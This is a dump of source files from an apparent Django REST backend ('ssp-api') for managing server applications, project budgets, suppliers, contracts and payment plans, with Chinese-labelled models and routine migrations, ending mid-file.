"content_id": "11aa93488a01b96d691836ba0e423fab0e1b4fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 939,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 20,
"path": "/apps/administrator/urls.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/4/25 14:05'\nfrom django.conf.urls import url,include\nfrom django.views.generic import TemplateView\nimport xadmin\nfrom django.views.static import serve\n\nfrom .views import LoginView,RootApplicationListView,ServerApplicationListView,EmailListView,FileUploaderView\nfrom application.views import RootApplicationDetailView,UsingApplicationDetailView\nurlpatterns = [\n url(r'^login/$',LoginView.as_view(),name=\"administratorLogin\"),\n url(r'^rootApplication/$',RootApplicationListView.as_view(),name=\"rootApplicationList\"),\n url(r'^rootApplication/(?P<pk>[0-9]+)$',RootApplicationDetailView.as_view()),\n url(r'^serverApplication/$',ServerApplicationListView.as_view()),\n url(r'^serverApplication/(?P<pk>[0-9]+)$',UsingApplicationDetailView.as_view()),\n url(r'^emailApplication/$',EmailListView.as_view()),\n url(r'^fileUploader/$',FileUploaderView.as_view())\n\n]"
},
{
"alpha_fraction": 0.521212100982666,
"alphanum_fraction": 0.6282828450202942,
"avg_line_length": 25.052631378173828,
"blob_id": "c37804cc96166cdd8bf8762148001ca2980077a1",
"content_id": "ebd3fd88c859cd447b74e466475ca69db3c2878a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 19,
"path": "/apps/serverApplication/migrations/0006_auto_20170227_1555.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-27 15:55\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0005_auto_20170227_1554'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='environment',\n options={'verbose_name': '\\u73af\\u5883\\u7c7b\\u522b', 'verbose_name_plural': '\\u73af\\u5883\\u7c7b\\u522b'},\n ),\n ]\n"
},
{
"alpha_fraction": 0.6077170372009277,
"alphanum_fraction": 0.6688103079795837,
"avg_line_length": 24.66666603088379,
"blob_id": "fad3b745392c7b4f4341596c282627542f8c958b",
"content_id": "400982221f10a9dd59d2e39e4c41baa4dbbb23bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 12,
"path": "/apps/utils/findDate.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/3/6 15:59'\n\nimport datetime\n\n\ndaysMap = [30,90,180,datetime.date.today().year,0]\ndef getDays(conditionTime):\n return daysMap[int(conditionTime)]\ndef getDate(days):\n return (datetime.datetime.now() - datetime.timedelta(days=days)).date()\n\n\n\n"
},
{
"alpha_fraction": 0.5343227982521057,
"alphanum_fraction": 0.6270871758460999,
"avg_line_length": 25.950000762939453,
"blob_id": "a9f13d44a601d4c233d1089bc27a5618b15be619",
"content_id": "92a37aa36f919e10eb585204322afb21e6921eed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0002_auto_20170327_1633.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-27 16:33\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='project',\n name='department',\n field=models.CharField(default='\\u6280\\u672f\\u5f00\\u53d1\\u4e2d\\u5fc3', max_length=100, verbose_name='\\u4e3b\\u529e\\u90e8\\u95e8'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.8150943517684937,
"avg_line_length": 43.33333206176758,
"blob_id": "021f2f2aa2f7e477ccfe70e86f79431f038943f9",
"content_id": "dde72d25ae8a8b4a99024ec6547507b2467fef1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 6,
"path": "/media/scripts/2017/04/functional_tests.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nbinary = FirefoxBinary(r'E:\\浏览器\\firefox.exe')\nbrowser = webdriver.Firefox(firefox_binary=binary)\nbrowser.get('http://localhost:8000')\nassert 'Django' in browser.title"
},
{
"alpha_fraction": 0.6508589386940002,
"alphanum_fraction": 0.6566658616065979,
"avg_line_length": 35.90178680419922,
"blob_id": "a9ef78e0b4b72f9d9b47147f4d9758d2094e5827",
"content_id": "f86e503f9baaa14f2a9e935e99c34f0c132e7d03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4133,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 112,
"path": "/apps/serverApplication/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom django.db.models import Q\nfrom rest_framework import generics\nfrom .models import Application, Os, Environment, Source\nfrom .serializer import ApplicationSerializer, OsSerializer, EnvironmentSerializer,SourceSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n# import redis\n# import msgpack\n\n\n# redisClient = redis.StrictRedis(host='localhost', port=6379)\n\n# def settingsFactory(name):\n#\n# querySet = redisClient.hgetall(name)\n# if querySet is not None:\n# result = msgpack.unpack(querySet)\n# return result\n# else:\n# if name == 'Os':\n# print 'os'\n# querySet = Os.objects.all()\n# serializer = OsSerializer(querySet,many=True)\n# elif name == 'Source':\n# querySet = Source.objects.all()\n# serializer = SourceSerializer(querySet,many=True)\n# else:\n# querySet = Environment.objects.all()\n# serializer = EnvironmentSerializer(querySet,many=True)\n#\n# # redisClient.set(name,querySet)\n#\n# redisClient.hmset(name,querySet)\n# return querySet\n# Create your views here.\nclass Pagination(LimitOffsetPagination):\n default_limit = 10\n limit_query_param = \"limit\"\n offset_query_param = \"offset\"\n max_limit = None\n\nclass ApplicationListView(generics.ListCreateAPIView):\n queryset = Application.objects.all()\n pagination_class = Pagination\n serializer_class = ApplicationSerializer\n\n def get_queryset(self):\n queryset = Application.objects.all()\n username = self.request.query_params.get('username', None)\n received = self.request.query_params.get('received', None)\n ip = self.request.query_params.get('ip', None)\n team = self.request.query_params.get('team', None)\n source = self.request.query_params.get('source', None)\n os = self.request.query_params.get('os', None)\n aQ = Q()\n if username is not None:\n aQ.add(Q(username__startswith=username), Q.AND)\n if received is not None:\n aQ.add(Q(received__startswith=received), Q.AND)\n if ip is not None:\n aQ.add(Q(ip__startswith=ip), Q.AND)\n if team is not None:\n aQ.add(Q(team__startswith=team), Q.AND)\n if source is not None:\n aQ.add(Q(source__startswith=source), Q.AND)\n if os is not None:\n aQ.add(Q(os__startswith=os), Q.AND)\n queryset = queryset.filter(aQ)\n return queryset\n\nclass OsListView(APIView):\n def get(self,request):\n os = Os.objects.all()\n # os = settingsFactory('Os')\n serializer = OsSerializer(os,many=True)\n return Response(serializer.data)\n def post(self,request):\n serializer = OsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\nclass EnvironmentView(APIView):\n def get(self,request):\n environment = Environment.objects.all()\n serializer = EnvironmentSerializer(environment,many=True)\n return Response(serializer.data)\n\n def post(self,request):\n serializer = EnvironmentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\nclass SourceListView(APIView):\n def get(self,request):\n source = Source.objects.all()\n serializer = SourceSerializer(source,many=True)\n return Response(serializer.data)\n\n def post(self,request):\n serializer = SourceSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n"
},
{
"alpha_fraction": 0.4173845052719116,
"alphanum_fraction": 0.5974941253662109,
"avg_line_length": 46.296295166015625,
"blob_id": "2201f41946a7ef373f61e79b8f1d4fe5a51f57f1",
"content_id": "88110bba7dfd325f8561c163f2a31346c72b7074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "no_license",
"max_line_length": 554,
"num_lines": 27,
"path": "/apps/application/migrations/0010_order.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-01 17:00\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0009_auto_20170228_1831'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('orderId', models.CharField(max_length=200)),\n ('status', models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u5206\\u914d\\u5b8c\\u6210', '\\u5206\\u914d\\u5b8c\\u6210'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u56de\\u6536\\u7533\\u8bf7\\u4e2d', '\\u56de\\u6536\\u7533\\u8bf7\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20)),\n ],\n options={\n 'verbose_name': '\\u8ba2\\u5355',\n 'verbose_name_plural': '\\u8ba2\\u5355',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6290726661682129,
"alphanum_fraction": 0.6817042827606201,
"avg_line_length": 27.5,
"blob_id": "4f6a4807003da7820bca6ea3185cc1399492173f",
"content_id": "992af898e4d3a7b5998f2472ddbb491931e79ec8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 14,
"path": "/apps/utils/redisHandler.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/3/10 11:28'\n\nimport redis\n\nclass RedisPool:\n def getRedis(self,ClientHost=\"localhost\",ClientPort=6379,ClientDb=0):\n pool = redis.ConnectionPool(host=ClientHost,port=ClientPort,db=ClientDb)\n return redis.StrictRedis(connection_pool=pool)\n\ndef main():\n Pool = RedisPool()\n redis = Pool.getRedis(\"localhost\",6379)\n"
},
{
"alpha_fraction": 0.6326530575752258,
"alphanum_fraction": 0.6632652878761292,
"avg_line_length": 27.071428298950195,
"blob_id": "d9ec8ddedbb42fc1ef018478dee554039a5b3dac",
"content_id": "ac2e65829dbd1ae62d2222e34326b98d6a89e7a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 400,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 14,
"path": "/apps/utils/email_send.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/22 14:31'\n\nfrom django.core.mail import send_mail\nfrom SspApi.settings import EMAIL_FROM\n\ndef send_email(email,content,send_type=\"root权限申请\"):\n email_title = send_type\n email_body = content\n email = email.split(\";\")\n send_status = send_mail(email_title,email_body,EMAIL_FROM,email)\n if send_status:\n pass"
},
{
"alpha_fraction": 0.651461124420166,
"alphanum_fraction": 0.6573604345321655,
"avg_line_length": 37.56349182128906,
"blob_id": "fb53e93eec5e282111c3a2bb636d83d4fc78f0ee",
"content_id": "aa95ec4f2fda64f1c114b58dc2516e23666235d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14584,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 378,
"path": "/apps/contractBudget/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom django.shortcuts import render\n\nfrom datetime import date\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework import generics\nfrom django.db.models import Q\nfrom django.http import Http404\nfrom rest_framework.decorators import api_view\nimport datetime\n\nfrom .models import Project, Budget, Supplier, Contract, PaymentPlan, PaymentRecord\nfrom .serializer import ProjectSerizlizer, BudgetSerializer, SupplierSerializer, \\\n ContractSerializer, PaymentPlanSerializer, PaymentRecordSerializer\n\n\n# Create your views here.\n\n\nclass Pagination(LimitOffsetPagination):\n default_limit = 20\n limit_query_param = \"limit\"\n offset_query_param = \"offset\"\n max_limit = None\n\n\nclass ProjectListView(generics.ListCreateAPIView):\n queryset = Project.objects.all()\n pagination_class = Pagination\n serializer_class = ProjectSerizlizer\n\n def get_queryset(self):\n queryset = Project.objects.all()\n condition = self.request.query_params.get(\"condition\", \"\")\n if condition == \"\":\n return queryset\n else:\n aQ = Q()\n aQ.add(Q(projectId__startswith=condition) | Q(name__startswith=condition), Q.AND)\n queryset = queryset.filter(aQ)\n return queryset\n\n def post(self, request, *args, **kwargs):\n serializer = ProjectSerizlizer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProjectDetailView(APIView):\n def get_object(self, pk):\n try:\n return Project.objects.get(pk=pk)\n except Project.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n project = self.get_object(pk)\n serializer = ProjectSerizlizer(project)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n project = self.get_object(pk)\n serializer = ProjectSerizlizer(project, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetListView(APIView):\n def get(self, request, format=None):\n projectId = request.query_params.get(\"projectId\", None)\n if projectId is None:\n budgets = Budget.objects.all()\n else:\n project = Project.objects.get(projectId=projectId)\n budgets = project.budget_set.all()\n serializer = BudgetSerializer(budgets, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n projectId = request.data.get(\"projectId\")\n year = request.data.get(\"year\")\n investment = float(request.data.get(\"investment\"))\n maintain = float(request.data.get(\"maintain\"))\n development = float(request.data.get(\"development\"))\n total = float(request.data.get(\"total\"))\n project = Project.objects.get(projectId=projectId)\n budget = Budget(project=project, year=year, investment=investment, maintain=maintain, development=development,\n total=total)\n budget.save()\n return Response({\"budget\": budget.__str__()}, status=status.HTTP_201_CREATED)\n # return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetDetailView(APIView):\n def get_object(self, pk):\n try:\n return Budget.objects.get(pk=pk)\n except Budget.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n Budget = self.get_object(pk)\n serializer = BudgetSerializer(Budget)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n project = self.get_object(pk)\n serializer = BudgetSerializer(project, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n budget = self.get_object(pk)\n budget.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass SupplierListView(generics.ListCreateAPIView):\n queryset = Supplier.objects.all()\n pagination_class = Pagination\n serializer_class = SupplierSerializer\n\n def get_queryset(self):\n queryset = Supplier.objects.all()\n supplierId = self.request.query_params.get(\"supplierId\", None)\n aQ = Q()\n if supplierId is None:\n return queryset\n if supplierId != \"\":\n aQ.add(Q(supplierId=supplierId), Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n\nclass SupplierDetailView(APIView):\n def get_object(self, pk):\n try:\n return Supplier.objects.get(pk=pk)\n except Supplier.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n Supplier = self.get_object(pk)\n serializer = SupplierSerializer(Supplier)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n Supplier = self.get_object(pk)\n serializer = SupplierSerializer(Supplier, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n Supplier = self.get_object(pk)\n Supplier.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass ContractListView(generics.ListCreateAPIView):\n queryset = Contract.objects.all()\n pagination_class = Pagination\n serializer_class = ContractSerializer\n\n\n\n def get_queryset(self):\n queryset = Contract.objects.all()\n projectId = self.request.query_params.get(\"projectId\", None)\n aQ = Q()\n if projectId is None:\n return queryset\n if projectId != \"\":\n project = Project.objects.get(projectId=projectId)\n aQ.add(Q(project=project.id), Q.AND)\n queryset = queryset.filter(aQ).order_by(\"id\")\n return queryset\n\n def post(self, request, format=None):\n projectId = request.data.get(\"projectId\")\n project = Project.objects.get(projectId=projectId)\n contractId = request.data.get(\"contractId\")\n lawId = request.data.get(\"lawId\")\n status1 = request.data.get(\"status\")\n supplierId = request.data.get(\"supplierId\")\n supplier = Supplier.objects.get(supplierId=supplierId)\n accountName = supplier.accountName\n bankMaster = supplier.bankMaster\n investment = float(request.data.get(\"investment\"))\n maintain = float(request.data.get(\"maintain\"))\n development = float(request.data.get(\"development\"))\n total = float(request.data.get(\"total\"))\n signDate = request.data.get(\"signDate\")\n subscriber = request.data.get(\"subscriber\")\n handlerPerson = request.data.get(\"handlerPerson\")\n comment = request.data.get(\"comment\")\n name = request.data.get(\"name\")\n contract = Contract(contractId=contractId, project=project, lawId=lawId, status=status1, supplierId=supplierId,\n accountName=accountName, bankMaster=bankMaster, investment=investment, maintain=maintain,\n development=development, total=total, signDate=signDate, subscriber=subscriber,\n handlerPerson=handlerPerson,\n comment=comment, name=name)\n contract.save()\n return Response({\"budget\": contract.__str__()}, status=status.HTTP_201_CREATED)\n\n\nclass ContractDetailView(APIView):\n def get_object(self, pk):\n try:\n return Contract.objects.get(pk=pk)\n except Contract.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n contract = self.get_object(pk)\n serializer = ContractSerializer(contract)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n contract = self.get_object(pk)\n serializer = ContractSerializer(contract, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n contract = self.get_object(pk)\n contract.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass PaymentPlanListView(APIView):\n def get(self, request, format=None):\n contractId = request.query_params.get(\"contractId\", None)\n if contractId is None:\n payments = PaymentPlan.objects.all()\n else:\n contract = Contract.objects.get(contractId=contractId)\n payments = PaymentPlan.objects.filter(contract=contract.id)\n serializer = PaymentPlanSerializer(payments, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n contractId = request.data.get(\"contractId\")\n contract = Contract.objects.get(contractId=contractId)\n if contract is None:\n return Response({\"msg\": \"contract不存在\"}, status=status.HTTP_400_BAD_REQUEST)\n else:\n paymentTime = request.data.get(\"paymentTime\")\n numOfPayments = int(request.data.get(\"numOfPayments\"))\n ratioOfPayments = request.data.get(\"ratioOfPayments\")\n investment = float(request.data.get(\"investment\"))\n maintain = float(request.data.get(\"maintain\"))\n development = float(request.data.get(\"development\"))\n total = float(request.data.get(\"total\"))\n items = request.data.get(\"items\")\n paymentPlan = PaymentPlan(contract=contract, numOfPayments=numOfPayments, ratioOfPayments=ratioOfPayments,\n investment=investment, maintain=maintain, development=development, total=total,\n paymentTime=paymentTime, items=items)\n paymentPlan.save()\n return Response({\"msg\": \"success\"}, status=status.HTTP_201_CREATED)\n\n\nclass PaymentPlanDetailView(APIView):\n def get_object(self, pk):\n try:\n return PaymentPlan.objects.get(pk=pk)\n except PaymentPlan.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n paymentplan = self.get_object(pk)\n serializer = PaymentPlanSerializer(paymentplan)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n paymentplan = self.get_object(pk)\n serializer = PaymentPlanSerializer(paymentplan, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n paymentplan = self.get_object(pk)\n paymentplan.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass PaymentRecordListView(APIView):\n def get(self, request, format=None):\n paymentPlanPk = request.query_params.get(\"paymentPlanPk\", None)\n contractId = request.query_params.get(\"contractId\", None)\n if paymentPlanPk is None:\n paymentplans = PaymentRecord.objects.all()\n else:\n paymentplans = PaymentRecord.objects.all().filter(paymentPlanPk=paymentPlanPk)\n if contractId is None:\n pass\n else:\n paymentplans = PaymentRecord.objects.all().filter(contractId=contractId)\n serializer = PaymentRecordSerializer(paymentplans, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = PaymentRecordSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PaymentRecordDetailView(APIView):\n def get_object(self, pk):\n try:\n return PaymentRecord.objects.get(pk=pk)\n except PaymentRecord.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n paymentRecord = self.get_object(pk)\n serializer = PaymentRecordSerializer(paymentRecord)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n paymentRecord = self.get_object(pk)\n serializer = PaymentRecordSerializer(paymentRecord, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n paymentRecord = self.get_object(pk)\n paymentRecord.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET', 'POST', ])\ndef getContractByPaymentPlan(request, pk):\n paymentPlan = PaymentPlan.objects.get(pk=pk)\n serializer = PaymentPlanSerializer(paymentPlan)\n contract = paymentPlan.contract\n contractId = contract.contractId\n return Response(data={\"contractId\": contractId, \"paymentPlan\": serializer.data})\n@api_view(['GET'])\ndef getContractByContractId(request):\n contract = Contract.objects.get(contractId=request.query_params.get(\"contractId\"))\n serializer = ContractSerializer(contract)\n return Response(serializer.data)\n\nclass ContractPaymentListView(generics.ListCreateAPIView):\n queryset = Contract.objects.all()\n pagination_class = Pagination\n serializer_class = ContractSerializer\n\n def get_queryset(self):\n queryset = Contract.objects.all()\n condition = self.request.query_params.get(\"condition\", \"\")\n if condition == \"\":\n return queryset\n else:\n aQ = Q()\n aQ.add(Q(contractId__startswith=condition) | Q(name__startswith=condition), Q.AND)\n queryset = queryset.filter(aQ)\n return queryset\n\n"
},
{
"alpha_fraction": 0.5371900796890259,
"alphanum_fraction": 0.7190082669258118,
"avg_line_length": 17.149999618530273,
"blob_id": "b0064141df80106b8e8b526416041354ed0fdb13",
"content_id": "2e6571cf3d5c8e1abb72813e3fea6612ffd241b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 363,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "appdirs==1.4.0\nDjango==1.9\ndjango-cors-headers==1.3.1\ndjango-crispy-forms==1.6.1\ndjango-formtools==2.0\ndjango-simple-captcha==0.4.6\ndjangorestframework==3.5.1\nDjangoUeditor==1.8.143\net-xmlfile==1.0.1\ngunicorn==19.6.0\nhttplib2==0.9.2\njdcal==1.3\nolefile==0.44\nopenpyxl==2.4.1\npackaging==16.8\nPillow==4.0.0\nPyMySQL==0.7.9\npyparsing==2.1.10\npytz==2016.10\nsix==1.10.0\n"
},
{
"alpha_fraction": 0.6875424385070801,
"alphanum_fraction": 0.7057026624679565,
"avg_line_length": 49.80172348022461,
"blob_id": "9c0cb16ea7ef79351cdc43c0e21e43e25239bbc5",
"content_id": "598597911773b3bef52f0ca4145c5f985efc9e1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6586,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 116,
"path": "/apps/contractBudget/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\nfrom django.db import models\n\n\nclass Project(models.Model):\n projectId = models.CharField(max_length=200, unique=True, blank=False, verbose_name=\"项目编号\")\n name = models.CharField(max_length=200, blank=False, verbose_name=\"项目名称\")\n type = models.CharField(max_length=100, verbose_name=\"项目类型\")\n department = models.CharField(verbose_name=\"主办部门\", max_length=100,default=\"技术开发中心\")\n investment = models.FloatField(verbose_name=\"项目批复投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"项目批复维保费用\", default=0)\n development = models.FloatField(verbose_name=\"项目批复研发费用\", default=0)\n total = models.FloatField(verbose_name=\"项目批复总费用\", default=0)\n status = models.CharField(choices=((\"执行中\", \"执行中\"), (\"执行完\", \"执行完\"), (\"已移交\", \"已移交\")), default=\"执行中\", max_length=10,\n verbose_name=\"状态\")\n comment = models.CharField(max_length=500, verbose_name=\"备注\", blank=True)\n add_time = models.DateTimeField(default=datetime.now, verbose_name=\"添加时间\")\n lastModified = models.DateTimeField(default=datetime.now, verbose_name=\"最后修改时间\")\n\n class Meta:\n verbose_name = \"项目信息\"\n verbose_name_plural = verbose_name\n ordering = ('add_time',)\n\n\nclass Budget(models.Model):\n project = models.ForeignKey(Project, verbose_name=\"所属项目\")\n year = models.CharField(verbose_name=\"预算年度\", max_length=10)\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总计\",default=0)\n add_time = models.DateTimeField(verbose_name=\"添加时间\", default=datetime.now)\n lastModified = models.DateTimeField(verbose_name=\"最后修改时间\", default=datetime.now)\n\n class Meta:\n verbose_name = \"项目预算\"\n verbose_name_plural = verbose_name\n ordering = ('year',)\n\nclass Supplier(models.Model):\n supplierId = models.CharField(max_length=100,unique=True,verbose_name=\"供应商编号\",blank=False)\n accountName= models.CharField(max_length=100,verbose_name=\"开户名称\")\n bankMaster = models.CharField(max_length=50,verbose_name=\"开户银行\")\n bankBranch = models.CharField(max_length=50,verbose_name=\"开户支行\")\n accountId = models.CharField(max_length=100,verbose_name=\"银行账号\")\n accountAddr = models.CharField(max_length=100,verbose_name=\"开户所在地\")\n contact = models.CharField(max_length=50,verbose_name=\"联系人\")\n phone = models.CharField(max_length=50,verbose_name=\"联系方式\")\n email = models.CharField(max_length=50,verbose_name=\"电子邮箱地址\")\n add_time = models.DateTimeField(default=datetime.now,verbose_name=\"添加时间\")\n class Meta:\n verbose_name = \"供应商\"\n verbose_name_plural = verbose_name\n ordering = ('add_time',)\n\n\nclass Contract(models.Model):\n contractId = models.CharField(verbose_name=\"合同编号\",unique=True,max_length=100,blank=False)\n lawId = models.CharField(verbose_name=\"律审编号\",max_length=100,blank=True)\n project = models.ForeignKey(Project,verbose_name=\"所属项目\")\n status = models.CharField(choices=((\"执行中\",\"执行中\"),(\"执行完\",\"执行完\"),(\"已移交\",\"已移交\")),default=\"执行中\",max_length=10)\n supplierId = models.CharField(max_length=100,verbose_name=\"乙方编号\")\n accountName = models.CharField(max_length=50,verbose_name=\"乙方账户名称\")\n bankMaster = models.CharField(max_length=50,verbose_name=\"乙方开户行\")\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总费用\", default=0)\n signDate = models.CharField(verbose_name=\"签署时间\",max_length=50)\n subscriber = models.CharField(verbose_name=\"签署人\",max_length=20)\n handlerPerson = models.CharField(verbose_name=\"合同经办人\",max_length=50)\n comment = models.CharField(verbose_name=\"合同内容\",max_length=500)\n name = models.CharField(verbose_name=\"合同名称\",max_length=50)\n\n class Meta:\n verbose_name = \"合同\"\n verbose_name_plural = verbose_name\n ordering = ('signDate',)\n\nclass 